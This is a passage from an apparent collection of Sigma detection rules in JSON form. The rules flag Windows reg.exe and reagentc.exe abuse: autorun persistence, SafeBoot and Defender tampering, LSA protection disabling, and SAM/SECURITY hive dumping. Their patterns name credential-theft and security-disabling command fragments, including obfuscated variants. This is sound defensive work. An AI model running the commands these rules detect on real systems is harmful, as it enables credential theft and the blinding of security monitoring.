    "content": "title: Windows Recovery Environment Disabled Via Reagentc\nid: db1c21e4-cd66-4b4e-85ca-590f0780529c\nstatus: experimental\ndescription: |\n    Detects attempts to disable the Windows Recovery Environment using Reagentc.\n    ReAgentc.exe is a command-line tool in Windows used to manage the Windows Recovery Environment (WinRE).\n    It allows users to enable, disable, and configure WinRE, which is used for troubleshooting and repairing common boot issues.\nreferences:\n    - https://www.elastic.co/security-labs/maas-appeal-an-infostealer-rises-from-the-ashes\n    - https://learn.microsoft.com/en-us/windows-hardware/manufacture/desktop/reagentc-command-line-options?view=windows-11\nauthor: Daniel Koifman (KoifSec), Michael Vilshin\ndate: 2025-07-31\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:   # Example command simulated:  reagentc /disable\n        - Image|endswith: '\\reagentc.exe'\n        - OriginalFileName: 'reagentc.exe'\n    selection_cli:\n        CommandLine|contains|windash: '/disable'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml",
    "content": "title: Potential Persistence Attempt Via Run Keys Using Reg.EXE\nid: de587dce-915e-4218-aac4-835ca6af6f70\nstatus: test\ndescription: Detects suspicious use of the reg.exe command line tool to add a value to a Run key in the registry\nreferences:\n    - https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/\n    - https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys\n    - https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md\nauthor: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2021-06-28\nmodified: 2025-02-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\reg.exe'\n        CommandLine|contains|all:\n            - 'reg'\n            - ' add '\n        CommandLine|contains:\n            - 'Software\\Microsoft\\Windows\\CurrentVersion\\Run'\n            - '\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run'\n            - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run'\n    condition: selection\nfalsepositives:\n    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.\n    - Legitimate administrator sets up autorun keys for legitimate reasons.\n    - Discord\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_reg_add_run_key/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml",
    "content": "title: Add SafeBoot Keys Via Reg Utility\nid: d7662ff6-9e97-4596-a61d-9839e32dee8d\nrelated:\n    - id: fc0e89b5-adb0-43c1-b749-c12a10ec37de\n      type: similar\nstatus: test\ndescription: Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attackers to allow ransomware to run in safe mode, where some security products do not\nreferences:\n    - https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-02\nmodified: 2024-03-19\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_safeboot:\n        CommandLine|contains: '\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot'\n    selection_flag:\n        CommandLine|contains:\n            - ' copy '\n            - ' add '\n    condition: all of selection*\nfalsepositives:\n    - Unlikely\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_reg_add_safeboot/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_bitlocker.yml",
    "content": "title: Suspicious Reg Add BitLocker\nid: 0e0255bf-2548-47b8-9582-c0955c9283f5\nstatus: test\ndescription: Detects suspicious addition to BitLocker related registry keys via the reg.exe utility\nreferences:\n    - https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\nauthor: frack113\ndate: 2021-11-15\nmodified: 2022-09-09\ntags:\n    - attack.impact\n    - attack.t1486\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'REG'\n            - 'ADD'\n            - '\\SOFTWARE\\Policies\\Microsoft\\FVE'\n            - '/v'\n            - '/f'\n        CommandLine|contains:\n            - 'EnableBDEWithNoTPM'\n            - 'UseAdvancedStartup'\n            - 'UseTPM'\n            - 'UseTPMKey'\n            - 'UseTPMKeyPIN'\n            - 'RecoveryKeyMessageSource'\n            - 'UseTPMPIN'\n            - 'RecoveryKeyMessage'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_credential_access_via_password_filter.yml",
    "content": "title: Dropping Of Password Filter DLL\nid: b7966f4a-b333-455b-8370-8ca53c229762\nstatus: test\ndescription: Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS\nreferences:\n    - https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/\n    - https://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter\nauthor: Sreeman\ndate: 2020-10-29\nmodified: 2022-10-09\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.t1556.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cmdline:\n        CommandLine|contains|all:\n            - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa'\n            - 'scecli\\0*'\n            - 'reg add'\n    condition: selection_cmdline\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_defender_exclusion.yml",
    "content": "title: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE\nid: 48917adc-a28e-4f5d-b729-11e75da8941f\nstatus: test\ndescription: Detects the usage of \"reg.exe\" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData.\nreferences:\n    - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/\n    - https://redcanary.com/threat-detection-report/threats/qbot/\nauthor: frack113\ndate: 2022-02-13\nmodified: 2023-02-04\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\reg.exe'\n        CommandLine|contains:\n            - 'SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths'\n            - 'SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Paths'\n        CommandLine|contains|all:\n            - 'ADD '\n            - '/t '\n            - 'REG_DWORD '\n            - '/v '\n            - '/d '\n            - '0'\n    condition: selection\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_delete_runmru.yml",
    "content": "title: RunMRU Registry Key Deletion\nid: c11aecef-9c37-45a6-9c07-bc0782f963fd\nrelated:\n    - id: 3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55\n      type: similar\nstatus: experimental\ndescription: |\n    Detects deletion of the RunMRU registry key, which stores the history of commands executed via the Run dialog.\n    In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands.\n    Adversaries may delete this key to cover their tracks after executing commands.\nreferences:\n    - https://www.zscaler.com/blogs/security-research/coldriver-updates-arsenal-baitswitch-and-simplefix\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-09-25\ntags:\n    - attack.defense-evasion\n    - attack.t1070.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' del'\n            - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_delete_safeboot.yml",
    "content": "title: SafeBoot Registry Key Deleted Via Reg.EXE\nid: fc0e89b5-adb0-43c1-b749-c12a10ec37de\nrelated:\n    - id: d7662ff6-9e97-4596-a61d-9839e32dee8d\n      type: similar\nstatus: test\ndescription: Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attackers to prevent security products from running in safe boot\nreferences:\n    - https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html\nauthor: Nasreddine Bencherchali (Nextron Systems), Tim Shelton\ndate: 2022-08-08\nmodified: 2023-02-04\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: 'reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_delete:\n        CommandLine|contains|all:\n            - ' delete '\n            - '\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_delete_services.yml",
    "content": "title: Service Registry Key Deleted Via Reg.EXE\nid: 05b2aa93-1210-42c8-8d9a-2fcc13b284f5\nstatus: test\ndescription: Detects execution of \"reg.exe\" commands with the \"delete\" flag on the services registry key. Often used by attackers to remove AV software services\nreferences:\n    - https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-01\nmodified: 2023-02-04\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: 'reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_delete:\n        CommandLine|contains: ' delete '\n    selection_key:\n        # Add specific services if you would like the rule to be more specific\n        CommandLine|contains: '\\SYSTEM\\CurrentControlSet\\services\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_desktop_background_change.yml",
    "content": "title: Potentially Suspicious Desktop Background Change Using Reg.EXE\nid: 8cbc9475-8d05-4e27-9c32-df960716c701\nrelated:\n    - id: 85b88e05-dadc-430b-8a9e-53ff1cd30aae\n      type: similar\nstatus: test\ndescription: |\n    Detects the execution of \"reg.exe\" to alter registry keys that would replace the user's desktop background.\n    This is a common technique used by malware to change the desktop background to a ransom note or other image.\nreferences:\n    - https://www.attackiq.com/2023/09/20/emulating-rhysida/\n    - https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/\n    - https://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html\n    - https://www.virustotal.com/gui/file/a864282fea5a536510ae86c77ce46f7827687783628e4f2ceb5bf2c41b8cd3c6/behavior\n    - https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsDesktop::Wallpaper\n    - https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.ControlPanelDisplay::CPL_Personalization_NoDesktopBackgroundUI\nauthor: Stephen Lincoln @slincoln-aiq (AttackIQ)\ndate: 2023-12-21\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.impact\n    - attack.t1112\n    - attack.t1491.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    # TODO: Improve this to also focus on variation using PowerShell and other CLI tools\n    selection_reg_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_reg_flag:\n        CommandLine|contains: 'add'\n    selection_keys:\n        CommandLine|contains:\n            - 'Control Panel\\Desktop'\n            - 'CurrentVersion\\Policies\\ActiveDesktop'\n            - 'CurrentVersion\\Policies\\System'\n    selection_cli_reg_1:\n        CommandLine|contains|all:\n            - '/v NoChangingWallpaper'\n            - '/d 1' # Prevent changing desktop background\n    selection_cli_reg_2:\n        CommandLine|contains|all:\n            - '/v Wallpaper'\n            - '/t REG_SZ'\n    selection_cli_reg_3:\n        CommandLine|contains|all:\n            - '/v WallpaperStyle'\n            - '/d 2' # Stretch\n    condition: all of selection_reg_* and selection_keys and 1 of selection_cli_reg_*\nfalsepositives:\n    - Administrative scripts that change the desktop background to a company logo or other image.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_direct_asep_registry_keys_modification.yml",
    "content": "title: Direct Autorun Keys Modification\nid: 24357373-078f-44ed-9ac4-6d334a668a11\nstatus: test\ndescription: Detects direct modification of autostart extensibility points (ASEPs) in the registry using reg.exe.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\n    - https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md\nauthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2019-10-25\nmodified: 2026-01-05\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_cli_add:\n        CommandLine|contains: 'add'     # to avoid intersection with discovery tactic rules\n    selection_cli_keys:\n        CommandLine|contains:           # need to improve this list, there are plenty of ASEP reg keys\n            - '\\software\\Microsoft\\Windows\\CurrentVersion\\Run' # Also covers the strings \"RunOnce\", \"RunOnceEx\", \"RunServices\", \"RunServicesOnce\"\n            - '\\software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run'\n            - '\\software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run'\n            - '\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit'\n            - '\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n            - '\\software\\Microsoft\\Windows NT\\CurrentVersion\\Windows'\n            - '\\system\\CurrentControlSet\\Control\\SafeBoot\\AlternateShell'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.\n    - Legitimate administrator sets up autorun keys for legitimate reasons.\n    - Discord\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_disable_defender_wmi_autologger.yml",
    "content": "title: Disabling Windows Defender WMI Autologger Session via Reg.exe\nid: a1b2c3d4-e5f6-a7b8-c9d0-e1f2a3b4c5d6\nrelated:\n    - id: f37b4bce-49d0-4087-9f5b-58bffda77316\n      type: similar\nstatus: experimental\ndescription: |\n    Detects the use of reg.exe to disable the Event Tracing for Windows (ETW) Autologger session for Windows Defender API and Audit events.\n    By setting the 'Start' value to '0' for the 'DefenderApiLogger' or 'DefenderAuditLogger' session, an attacker can prevent these critical security events\n    from being logged, effectively blinding monitoring tools that rely on this data. This is a powerful defense evasion technique.\nreferences:\n    - https://research.splunk.com/endpoint/76406a0f-f5e0-4167-8e1f-337fdc0f1b0c/\n    - https://docs.microsoft.com/en-us/windows/win32/etw/configuring-and-starting-an-autologger-session\n    - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\n    - https://blog.malwarebytes.com/malwarebytes-news/2021/02/lazyscripter-from-empire-to-double-rat/\n    - https://www.binarly.io/blog/design-issues-of-modern-edrs-bypassing-etw-based-solutions\nauthor: Matt Anderson (Huntress)\ndate: 2025-07-09\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_reg_path:\n        CommandLine|contains:\n            - '\\Control\\WMI\\Autologger\\DefenderApiLogger\\Start'\n            - '\\Control\\WMI\\Autologger\\DefenderAuditLogger\\Start'\n    selection_reg_add:\n        CommandLine|contains|all:\n            - 'add'\n            - '0'\n    filter_main_enable:\n        CommandLine|contains: '0x00000001'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Highly unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_disable_sec_services.yml",
    "content": "title: Security Service Disabled Via Reg.EXE\nid: 5e95028c-5229-4214-afae-d653d573d0ec\nstatus: test\ndescription: Detects execution of \"reg.exe\" to disable security services such as Windows Defender.\nreferences:\n    - https://twitter.com/JohnLaTwC/status/1415295021041979392\n    - https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1\n    - https://vms.drweb.fr/virus/?i=24144899\n    - https://bidouillesecurity.com/disable-windows-defender-in-powershell/\nauthor: Florian Roth (Nextron Systems), John Lambert (idea), elhoim\ndate: 2021-07-14\nmodified: 2023-06-05\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_reg_add:\n        CommandLine|contains|all:\n            - 'reg'\n            - 'add'\n    selection_cli_reg_start:\n        CommandLine|contains|all:\n            - 'd 4'\n            - 'v Start'\n        CommandLine|contains:\n            - '\\AppIDSvc'\n            - '\\MsMpSvc'\n            - '\\NisSrv'\n            - '\\SecurityHealthService'\n            - '\\Sense'\n            - '\\UsoSvc'\n            - '\\WdBoot'\n            - '\\WdFilter'\n            - '\\WdNisDrv'\n            - '\\WdNisSvc'\n            - '\\WinDefend'\n            - '\\wscsvc'\n            - '\\wuauserv'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml",
    "content": "title: Dumping of Sensitive Hives Via Reg.EXE\nid: fd877b94-9bb5-4191-bb25-d79cbd93c167\nrelated:\n    - id: 038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e\n      type: obsolete\n    - id: 4d6c9da1-318b-4edf-bcea-b6c93fa98fd0\n      type: obsolete\nstatus: test\ndescription: Detects the usage of \"reg.exe\" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\n    - https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md\n    - https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets\nauthor: Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113\ndate: 2019-10-22\nmodified: 2023-12-13\ntags:\n    - attack.credential-access\n    - attack.t1003.002\n    - attack.t1003.004\n    - attack.t1003.005\n    - car.2013-07-001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_cli_flag:\n        CommandLine|contains:\n            - ' save '\n            - ' export '\n            - ' ˢave '\n            - ' eˣport '\n    selection_cli_hklm:\n        CommandLine|contains:\n            - 'hklm'\n            - 'hk˪m'\n            - 'hkey_local_machine'\n            - 'hkey_˪ocal_machine'\n            - 'hkey_loca˪_machine'\n            - 'hkey_˪oca˪_machine'\n    selection_cli_hive:\n        CommandLine|contains:\n            - '\\system'\n            - '\\sam'\n            - '\\security'\n            - '\\ˢystem'\n            - '\\syˢtem'\n            - '\\ˢyˢtem'\n            - '\\ˢam'\n            - '\\ˢecurity'\n    condition: all of selection_*\nfalsepositives:\n    - Dumping hives for legitimate purposes, e.g. backup or forensic investigation\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_enable_windows_recall.yml",
    "content": "title: Windows Recall Feature Enabled Via Reg.EXE\nid: 817f252c-5143-4dae-b418-48c3e9f63728\nrelated:\n    - id: 5dfc1465-8f65-4fde-8eb5-6194380c6a62\n      type: similar\n    - id: 75180c5f-4ea1-461a-a4f6-6e4700c065d4\n      type: similar\nstatus: test\ndescription: |\n    Detects the enabling of the Windows Recall feature via registry manipulation.\n    Windows Recall can be enabled by deleting the existing \"DisableAIDataAnalysis\" value, or setting it to 0.\n    Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.\n    This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/client-management/manage-recall\n    - https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis\nauthor: Sajid Nawaz Khan\ndate: 2024-06-02\ntags:\n    - attack.collection\n    - attack.t1113\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_value:\n        # HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis\n        # HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis\n        CommandLine|contains|all:\n            - 'Microsoft\\Windows\\WindowsAI'\n            - 'DisableAIDataAnalysis'\n    selection_action_add:\n        CommandLine|contains:\n            - 'add'\n            - '0'\n    selection_action_delete:\n        CommandLine|contains: 'delete'\n    condition: selection_img and selection_value and 1 of selection_action_*\nfalsepositives:\n    - Legitimate use/activation of Windows Recall\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_enumeration_for_credentials_in_registry.yml",
    "content": "title: Enumeration for Credentials in Registry\nid: e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1\nstatus: test\ndescription: |\n    Adversaries may search the Registry on compromised systems for insecurely stored credentials.\n    The Windows Registry stores configuration information that can be used by the system or other programs.\n    Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.002/T1552.002.md\nauthor: frack113\ndate: 2021-12-20\nmodified: 2022-12-25\ntags:\n    - attack.credential-access\n    - attack.t1552.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    reg:\n        Image|endswith: '\\reg.exe'\n        CommandLine|contains|all:\n            - ' query '\n            - '/t '\n            - 'REG_SZ'\n            - '/s'\n    hive:\n        - CommandLine|contains|all:\n              - '/f '\n              - 'HKLM'\n        - CommandLine|contains|all:\n              - '/f '\n              - 'HKCU'\n        - CommandLine|contains: 'HKCU\\Software\\SimonTatham\\PuTTY\\Sessions'\n    condition: reg and hive\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml",
    "content": "title: Potential Suspicious Registry File Imported Via Reg.EXE\nid: 62e0298b-e994-4189-bc87-bc699aa62d97\nrelated:\n    - id: 73bba97f-a82d-42ce-b315-9182e76c57b1\n      type: derived\nstatus: test\ndescription: Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import\nauthor: frack113, Nasreddine Bencherchali\ndate: 2022-08-01\nmodified: 2023-02-05\ntags:\n    - attack.persistence\n    - attack.t1112\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_cli:\n        CommandLine|contains: ' import '\n    selection_paths:\n        CommandLine|contains:\n            - 'C:\\Users\\'\n            - '%temp%'\n            - '%tmp%'\n            - '%appdata%'\n            - '\\AppData\\Local\\Temp\\'\n            - 'C:\\Windows\\Temp\\'\n            - 'C:\\ProgramData\\'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate import of keys\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml",
    "content": "title: RestrictedAdminMode Registry Value Tampering - ProcCreation\nid: 28ac00d6-22d9-4a3c-927f-bbd770104573\nrelated:\n    - id: d6ce7ebd-260b-4323-9768-a9631c8d4db2 # Registry\n      type: similar\nstatus: test\ndescription: |\n    Detects changes to the \"DisableRestrictedAdmin\" registry value in order to disable or enable RestrictedAdmin mode.\n    RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\n    This prevents your credentials from being harvested during the initial connection process if the remote server has been compromised.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md\n    - https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx\n    - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\nauthor: frack113\ndate: 2023-01-13\nmodified: 2025-08-28\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '\\System\\CurrentControlSet\\Control\\Lsa'\n            - 'DisableRestrictedAdmin'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml",
    "content": "title: LSA PPL Protection Disabled Via Reg.EXE\nid: 8c0eca51-0f88-4db2-9183-fdfb10c703f9\nstatus: test\ndescription: Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process\nreferences:\n    - https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-22\nmodified: 2023-03-26\ntags:\n    - attack.defense-evasion\n    - attack.t1562.010\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_cli:\n        CommandLine|contains: 'SYSTEM\\CurrentControlSet\\Control\\Lsa'\n        CommandLine|contains|all:\n            - ' add '\n            - ' /d 0'\n            - ' /v RunAsPPL '\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_machineguid.yml",
    "content": "title: Suspicious Query of MachineGUID\nid: f5240972-3938-4e56-8e4b-e33893176c1f\nstatus: test\ndescription: Use of reg to get MachineGuid information\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-8---windows-machineguid-discovery\nauthor: frack113\ndate: 2022-01-01\ntags:\n    - attack.discovery\n    - attack.t1082\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\reg.exe'\n        CommandLine|contains|all:\n            - 'SOFTWARE\\Microsoft\\Cryptography'\n            - '/v '\n            - 'MachineGuid'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_modify_group_policy_settings.yml",
    "content": "title: Modify Group Policy Settings\nid: ada4b0c4-758b-46ac-9033-9004613a150d\nrelated:\n    - id: b7216a7d-687e-4c8d-82b1-3080b2ad961f\n      type: similar\nstatus: test\ndescription: Detects malicious GPO modifications, which can be used to implement many other malicious behaviors.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md\nauthor: frack113\ndate: 2022-08-19\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1484.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_reg:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_path:\n        CommandLine|contains: '\\SOFTWARE\\Policies\\Microsoft\\Windows\\System'\n    selection_key:\n        CommandLine|contains:\n            - GroupPolicyRefreshTimeDC\n            - GroupPolicyRefreshTimeOffsetDC\n            - GroupPolicyRefreshTime\n            - GroupPolicyRefreshTimeOffset\n            - EnableSmartScreen\n            - ShellSmartScreenLevel\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_nolmhash.yml",
